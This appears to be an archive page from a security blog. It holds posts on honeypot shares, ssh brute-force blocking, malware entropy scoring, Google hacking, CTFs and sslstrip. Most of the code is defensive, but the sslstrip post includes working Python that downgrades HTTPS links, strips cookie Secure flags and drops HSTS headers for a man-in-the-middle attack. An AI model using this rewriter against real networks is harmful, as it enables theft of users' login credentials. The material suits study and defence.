Archive for category hardware & software

Assault on PHP Applications

This is a must-read if you’re a pen tester or PHP developer. It covers the big PHP bug classes: file inclusion, file upload vulnerabilities, command execution, and of course SQL injection.

Assault on PHP Applications

Blackhat Forums

Author: Aelphaeis Mangarae

Date: June 13, 2009

Setting up Windows Honey Pot Shares

I recently set up a honeypot share on a Windows server.  I put some very “interesting” files and directories in there (financial information, PII, etc.) and then enabled audit logging in Windows.  There’s a very powerful but mostly unknown Windows tool called LogParser which can run SQL-style queries against the System and Security event logs.  It’s possible to write a script that queries the Security log every so often and looks for access to the honeypot; since nobody has a legitimate reason to open those files, any hit is a high-confidence signal.  You can get very sophisticated using LogParser, a few hand-written scripts, and the Windows Task Scheduler.

  1. Create the honeypot file share.
  2. Create tempting files in the share: bank_statement.pdf, password_list.txt, 08taxes.pst, gmail.doc, megan13.jpg, etc.
  3. Enable audit logging on the shared folder: turn on Audit Object Access in the local or group audit policy, then add an auditing entry (SACL) on the folder for Everyone covering at least Read and List, so every access is written to the Security log.
  4. Install LogParser.
  5. Learn to use LogParser here: http://128.175.24.251/forensics/logparser.htm
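A small detector of the kind step 5 points at, as an added example (not the post’s own script and not a LogParser query): it assumes the audit settings produce event ID 5145 (Detailed File Share) records and that a LogParser export has already turned them into rows with the field names used below; the share name, file names, accounts and addresses are constructed sample data.

```python
"""Flag reads of honeypot files from exported Windows Security events.

Added example, not the script from the post. It assumes the folder's SACL
and the audit policy produce event ID 5145 records, and that a LogParser
query has already exported the fields below (field names are assumed).
The share, files, accounts and addresses are constructed, not real logs.
"""
from collections import defaultdict

HONEYPOT_SHARE = r"\\*\Finance$"        # assumed honeypot share, in 5145 format
# Accounts allowed to touch the share without an alert (backup agent, etc.).
ALLOWED_ACCOUNTS = {"SVC-BACKUP"}

# Constructed 5145-style records; a 4624 logon event is mixed in as noise.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Time": "2009-06-13 02:13:59", "AccountName": "jdoe",
     "SourceAddress": "10.0.0.23", "ShareName": "", "RelativeTargetName": ""},
    {"EventID": 5145, "Time": "2009-06-13 02:14:07", "AccountName": "jdoe",
     "SourceAddress": "10.0.0.23", "ShareName": r"\\*\Finance$",
     "RelativeTargetName": "\\"},                       # share root listing
    {"EventID": 5145, "Time": "2009-06-13 02:14:09", "AccountName": "jdoe",
     "SourceAddress": "10.0.0.23", "ShareName": r"\\*\Finance$",
     "RelativeTargetName": "bank_statement.pdf"},
    {"EventID": 5145, "Time": "2009-06-13 02:30:00", "AccountName": "SVC-BACKUP",
     "SourceAddress": "10.0.0.5", "ShareName": r"\\*\Finance$",
     "RelativeTargetName": "password_list.txt"},
    {"EventID": 5145, "Time": "2009-06-13 03:41:12", "AccountName": "asmith",
     "SourceAddress": "10.0.0.77", "ShareName": r"\\*\Finance$",
     "RelativeTargetName": "password_list.txt"},
    {"EventID": 5145, "Time": "2009-06-13 03:41:15", "AccountName": "asmith",
     "SourceAddress": "10.0.0.77", "ShareName": r"\\*\Finance$",
     "RelativeTargetName": "2008\\08taxes.pst"},
    {"EventID": 5145, "Time": "2009-06-13 03:50:00", "AccountName": "asmith",
     "SourceAddress": "10.0.0.77", "ShareName": r"\\*\Public",
     "RelativeTargetName": "readme.txt"},               # a different share
]


def honeypot_hits(events, share=HONEYPOT_SHARE, allowed=ALLOWED_ACCOUNTS):
    """Return the 5145 events that touched a file inside the honeypot share.

    Root listings ("\\") are dropped: Explorer generates them for anyone who
    browses the server, so alerting on them drowns the signal. Everything
    else in the share is a file nobody has a reason to open.
    """
    allowed_upper = {a.upper() for a in allowed}
    hits = []
    for ev in events:
        if ev.get("EventID") != 5145:
            continue
        if ev.get("ShareName", "").lower() != share.lower():
            continue
        if ev.get("AccountName", "").upper() in allowed_upper:
            continue
        if ev.get("RelativeTargetName", "") in ("", "\\"):
            continue
        hits.append(ev)
    return hits


def summarize(hits):
    """Group hits as {(account, source address): sorted list of files touched}."""
    by_actor = defaultdict(set)
    for ev in hits:
        by_actor[(ev["AccountName"], ev["SourceAddress"])].add(ev["RelativeTargetName"])
    return {actor: sorted(files) for actor, files in by_actor.items()}


if __name__ == "__main__":
    for (account, addr), files in summarize(honeypot_hits(SAMPLE_EVENTS)).items():
        print(f"ALERT {account}@{addr} opened {', '.join(files)}")
```

Run it from Task Scheduler against a fresh LogParser export every few minutes and page on any non-empty summary; the allow-list is what keeps the backup job from tripping it every night.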

Reduce ssh brute force attempts…

In case you’re still running sshd on port 22 (which you should change, though moving the port only cuts the noise; it is no substitute for key-based logins) you’re probably getting hammered with brute force attempts.  Take a peek at /var/log/secure or /var/log/wtmp, or just run the “last” command, and have a looksy.

There’s a great little application called “denyhosts” which will automatically add suspected brute forcers to your /etc/hosts.deny.


URL        : http://denyhosts.sourceforge.net/
License    : GPLv2
Description: DenyHosts is a Python script that analyzes the sshd server log
           : messages to determine which hosts are attempting to hack into your
           : system. It also determines what user accounts are being targeted.
           : It keeps track of the frequency of attempts from each host and,
           : upon discovering a repeated attack host, updates the
           : /etc/hosts.deny file to prevent future break-in attempts from that
           : host.  Email reports can be sent to a system admin.
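The counting logic that description sketches, written out as an added example in Python (not DenyHosts’ own code): it parses constructed sshd log lines in the format OpenSSH sends to syslog, counts failures per source host, treats guesses at nonexistent accounts as a stronger signal than failures against real ones, and emits /etc/hosts.deny lines. The thresholds and the allow-list are assumptions you would tune for your host.

```python
"""Count failed sshd logins per source and emit /etc/hosts.deny entries.

Added example in the spirit of DenyHosts, not DenyHosts' own code. The log
lines are constructed in the format OpenSSH writes via syslog; thresholds,
the allow-list and the TCP Wrappers line format ("sshd: ADDR") are assumed.
"""
import re
from collections import defaultdict

# OpenSSH logs "Failed password for invalid user NAME from ADDR" when the
# account does not exist, and "Failed password for NAME from ADDR" when it does.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<host>\S+) port \d+"
)

# Constructed sample of /var/log/secure (not real traffic).
SAMPLE_LOG = """\
Jun 13 03:02:11 web1 sshd[2201]: Invalid user admin from 203.0.113.5
Jun 13 03:02:13 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 40212 ssh2
Jun 13 03:02:15 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 40212 ssh2
Jun 13 03:02:19 web1 sshd[2204]: Failed password for invalid user oracle from 203.0.113.5 port 40219 ssh2
Jun 13 03:05:40 web1 sshd[2210]: Failed password for root from 198.51.100.7 port 51122 ssh2
Jun 13 03:05:42 web1 sshd[2210]: Failed password for root from 198.51.100.7 port 51122 ssh2
Jun 13 03:05:44 web1 sshd[2210]: Failed password for root from 198.51.100.7 port 51122 ssh2
Jun 13 03:05:46 web1 sshd[2212]: Failed password for root from 198.51.100.7 port 51130 ssh2
Jun 13 03:05:48 web1 sshd[2212]: Failed password for root from 198.51.100.7 port 51130 ssh2
Jun 13 03:10:02 web1 sshd[2220]: Failed password for bob from 192.0.2.9 port 33001 ssh2
Jun 13 03:10:05 web1 sshd[2220]: Failed password for bob from 192.0.2.9 port 33001 ssh2
Jun 13 03:10:09 web1 sshd[2220]: Accepted password for bob from 192.0.2.9 port 33001 ssh2
Jun 13 03:12:00 web1 sshd[2230]: Failed password for invalid user test from 10.0.0.2 port 44000 ssh2
Jun 13 03:12:01 web1 sshd[2230]: Failed password for invalid user test from 10.0.0.2 port 44000 ssh2
Jun 13 03:12:02 web1 sshd[2230]: Failed password for invalid user test from 10.0.0.2 port 44000 ssh2
"""

ALLOWED_HOSTS = {"10.0.0.2"}   # assumed: your own jump box; never deny it


def parse_failures(log_text):
    """Return {host: {"invalid": n, "valid": n, "users": set of targeted names}}."""
    stats = defaultdict(lambda: {"invalid": 0, "valid": 0, "users": set()})
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if not m:
            continue                      # "Invalid user", "Accepted", etc.
        s = stats[m["host"]]
        s["invalid" if m["invalid"] else "valid"] += 1
        s["users"].add(m["user"])
    return stats


def hosts_to_deny(stats, valid_threshold=5, invalid_threshold=2, allowed=ALLOWED_HOSTS):
    """Hosts whose failures crossed a threshold. Guessing nonexistent
    accounts is a stronger signal than typos on real ones, so it gets a
    lower bar; allow-listed hosts are never denied."""
    return {
        host for host, s in stats.items()
        if host not in allowed
        and (s["invalid"] >= invalid_threshold or s["valid"] >= valid_threshold)
    }


def hosts_deny_lines(hosts):
    """Lines to append to /etc/hosts.deny, one per host, in TCP Wrappers syntax."""
    return [f"sshd: {h}" for h in sorted(hosts)]


if __name__ == "__main__":
    stats = parse_failures(SAMPLE_LOG)
    for host in sorted(stats):
        s = stats[host]
        print(f"{host}: {s['valid']} valid-user, {s['invalid']} invalid-user "
              f"failures, targets={sorted(s['users'])}")
    print("\n".join(hosts_deny_lines(hosts_to_deny(stats))))
```

Note that hosts.deny only bites if sshd was built with TCP Wrappers support (OpenSSH dropped it in 6.7), so on a newer system feed the same decisions to the firewall instead.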

Penetration Testing & Capture the Flag

Penetration Testing

Nowadays penetration testing is where it’s at.  Whether you’re trying to learn security, become a white hat, or go into consulting, it’s a must-have skill.  However, it can be intimidating to know where to start.  Besides picking up books, the next best way to learn is through capture the flag events.

Important truths about pen testing

Capture the Flag

Computer/hacking capture the flag events are usually team-based, timed events where you’re pitted against several opponents and trying to earn the highest score.  In the attack/defense format points are awarded for both offensive and defensive maneuvers: typically each team has a virtual machine it needs to defend while trying to exploit vulnerabilities in the other teams’ VMs.  Jeopardy-style events instead award points for solving standalone challenges.

The best place to find one in your area (besides attending a con) is your local 2600 chapter.  If they don’t hold CTFs then try a local information security club.  If you live in the mountains and can’t find either you can use Hack This Site which runs virtual CTF events 24/7.

Remember, hacker (white hat) and cracker (black hat).

Malware Analyzers Part deuce

Several weeks ago I posted about different free malware analyzers (sandbox environments).  I’ve stumbled across another free tool from Mandiant, Red Curtain.  Red Curtain scans a given local directory or drive and analyzes each file, assigning it a threat score.  It takes into account whether the file is digitally signed, whether it looks packed, and its entropy: compressed or encrypted payloads score high on entropy, which is suspicious and deserves a closer look.
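Entropy is the easiest of those signals to compute, and it shows why a score rather than a single yes/no check is needed. The following is an added example, not Mandiant’s code: a per-window Shannon entropy scorer with assumed thresholds, run over constructed byte buffers rather than real executables.

```python
"""Shannon entropy as a packing/encryption indicator, one signal Red Curtain weighs.

Added example, not Mandiant's code. Thresholds are assumptions; the sample
buffers are constructed (the "packed" one is simply every byte value
cycling, which is maximally uniform) rather than taken from real binaries.
"""
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty/constant input, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_entropies(data: bytes, chunk: int = 256) -> list:
    """Entropy of each fixed-size window, so a packed section stands out even
    when the file as a whole is diluted by plain headers and strings."""
    return [shannon_entropy(data[i:i + chunk]) for i in range(0, len(data), chunk)]


def entropy_verdict(data: bytes, chunk: int = 256, high: float = 7.0) -> str:
    """Classify by the share of windows at or above `high` bits per byte.

    Plain code and text sit well below 7.0; compressed, packed or encrypted
    payloads sit above it. A valid digital signature is the usual reason to
    downgrade a high-entropy verdict (legitimate installers are often packed).
    """
    ents = chunk_entropies(data, chunk)
    if not ents:
        return "empty"
    share = sum(1 for e in ents if e >= high) / len(ents)
    if share >= 0.75:
        return "likely packed or encrypted"
    if share >= 0.25:
        return "mixed"
    return "plain"


# Constructed samples, not real files.
PLAIN = (b"This program cannot be run in DOS mode.\r\n" * 64)[:2048]
PACKED = bytes(range(256)) * 8          # 2048 bytes, every value equally often
MIXED = PLAIN[:1024] + PACKED[:1024]    # clean header followed by a packed blob


if __name__ == "__main__":
    for name, blob in (("plain", PLAIN), ("packed", PACKED), ("mixed", MIXED)):
        print(f"{name:7s} overall={shannon_entropy(blob):.2f} "
              f"verdict={entropy_verdict(blob)}")
```

The windowed view matters: the overall entropy of MIXED is dragged down by its plain half, but half of its windows are at 8.0 bits, which is exactly the shape of a small unpacking stub followed by a compressed payload.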

Another plus is that the tool can be remotely deployed, which is great for LAN and enterprise environments.

*I believe all their tools only run on Windows.

Google Hacking

Google hacking has been around for a while but unfortunately it is still very relevant.  Because Google’s crawler indexes so much, carefully built search queries (“dorks” using operators such as inurl:, intitle: and filetype:) can surface sensitive data: password files, exposed configuration and backup files, directory listings, and the banners or default pages that give away vulnerable versions of web servers, forum software, etc.

Google hacking database: http://www.hackersforcharity.org/ghdb/

UNetbootin: Live CDs to thumb drives made easy

I’ve always found it a major pain to correctly install a Live CD on a thumb drive.  You want to do this for SPEED.  Have you tried running BackTrack from a thumb drive?  Load times are incredible and there’s none of that annoying spin of the CD drive.  Of course it’s faster: you’re comparing optical media to solid state.  Just like my R1 to your Civic Si…

The tool could not be simpler: feed it any .ISO and tell it which mounted device to install to.  It writes the bootloader and the ISO’s files onto the drive’s existing FAT partition (it does not repartition the drive, so format it first and make sure it is large enough for the image).   So far I’ve tried it with BackTrack 3, 4 and Helix.

Download the multi-platform tool here: http://unetbootin.sourceforge.net/


Unlock iPhone: Run unofficial applications

I just came across these steps in Wired to unlock your iPhone:

  1. Update iTunes and the iPhone app installer.
  2. Download PwnageTool.
  3. Select “simple mode” and install Cydia.

*If anything goes wrong you can reverse the process by restoring the phone through iTunes.

**I don’t own an iPhone.  I use a Blackberry because I would rather accidentally leave a Blackberry lying around than an iPhone.  There’s no comparison in terms of privacy, encryption, and the confidentiality of your data.  Maybe this will warrant a future post…

Google Wave

At the recent Google I/O conference in San Francisco the next big Google project was announced: Google Wave.  Imagine being able to instant message and collaborate with multiple people in real time.  Chat rooms have been around for a while, but real-time collaboration is a new concept.  Wave is much more than an IRC chatroom: it allows users to include rich media in conversations and to add people on the fly.  You can add users to a “Wave” at any time, and new users can then “replay” the Wave to see what they missed.  A Wave is stored as a tree structure, which is what makes the replay possible.

Imagine having a blog + chatroom + flickr all with collaborative “wiki” abilities.  I’ll be the first to admit it is difficult to wrap your head around.

Definitely check out the developer preview video here.

SSL Strip

There’s a nice tool that performs SSL man-in-the-middle attacks.  In layman’s terms: run it on a gateway (or ARP-spoof yourself into that position) and it watches the victim’s plain HTTP traffic for links and redirects to HTTPS sites, rewriting each https:// to http://.  The victim’s browser then talks cleartext HTTP to the tool, which fetches the real site over HTTPS on its behalf, so the session is never encrypted on the victim’s side and you can sniff it with Wireshark.  i.e. someone goes to log into Gmail and, instead of an HTTPS session, you see the login form and the credentials go by in the clear.  The browser shows no certificate warning, only a missing padlock.

Check it out here: www.thoughtcrime.org/software/sslstrip/
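The rewriting step described above, as an added example (not sslstrip’s own code): a response fetched from the upstream HTTPS site has its redirects, cookie flags and links downgraded, and the proxy remembers which URLs it downgraded so it can fetch them over HTTPS when the victim later asks for the http:// version. The page, headers and hostnames are constructed.

```python
"""The link-rewriting core of an sslstrip-style attack.

Added example that shows the technique, not sslstrip's own code. The page,
headers and hostnames are constructed. A real tool sits at the gateway,
intercepts the victim's plain-HTTP traffic, fetches the upstream response
itself over HTTPS, and applies rewrites like these before relaying it back.
"""
import re

# Any https:// URL up to the quote or bracket that ends it in HTML.
URL_RE = re.compile(r"https://[^\s\"'<>]+", re.IGNORECASE)
# The "; Secure" attribute of a Set-Cookie header, wherever it appears.
SECURE_FLAG_RE = re.compile(r";\s*secure(?=;|\s*$)", re.IGNORECASE)


class Stripper:
    """Tracks every URL downgraded for the victim so the proxy knows to go
    back to HTTPS when the victim later requests the http:// version."""

    def __init__(self):
        self.stripped = set()      # http:// URLs that were originally https://

    def _downgrade(self, url: str) -> str:
        http_url = "http://" + url[len("https://"):]
        self.stripped.add(http_url)
        return http_url

    def rewrite_response(self, headers: list, body: str):
        """Downgrade redirects, cookie flags and in-page links. Returns (headers, body)."""
        new_headers = []
        for name, value in headers:
            lname = name.lower()
            if lname == "location" and value.lower().startswith("https://"):
                value = self._downgrade(value)
            elif lname == "set-cookie":
                # Without Secure the browser will send the cookie over plain HTTP.
                value = SECURE_FLAG_RE.sub("", value)
            elif lname == "strict-transport-security":
                continue   # if the browser learned this policy the attack would fail
            new_headers.append((name, value))
        new_body = URL_RE.sub(lambda m: self._downgrade(m.group(0)), body)
        return new_headers, new_body

    def upstream_url(self, requested: str) -> str:
        """Where the proxy should actually fetch a victim's request from."""
        if requested in self.stripped:
            return "https://" + requested[len("http://"):]
        return requested


# Constructed response from a login page (not a real site).
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "SID=abc123; Secure; HttpOnly"),
    ("Strict-Transport-Security", "max-age=31536000"),
    ("Location", "https://mail.example.com/inbox"),
]
SAMPLE_BODY = (
    '<form action="https://mail.example.com/login" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
    '<a href="https://mail.example.com/settings">Settings</a>'
    '<img src="http://static.example.com/logo.png">'
)


if __name__ == "__main__":
    s = Stripper()
    headers, body = s.rewrite_response(SAMPLE_HEADERS, SAMPLE_BODY)
    print(headers)
    print(body)
    print(sorted(s.stripped))
```

The defence is for the browser to never send that first plain-HTTP request: HTTP Strict Transport Security, the header the example has to drop, tells a browser that has seen it once to refuse HTTP for that host, and preloaded HSTS lists close the first-visit window. Sites that only serve HTTPS and never link to themselves over http:// give the tool nothing to rewrite.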
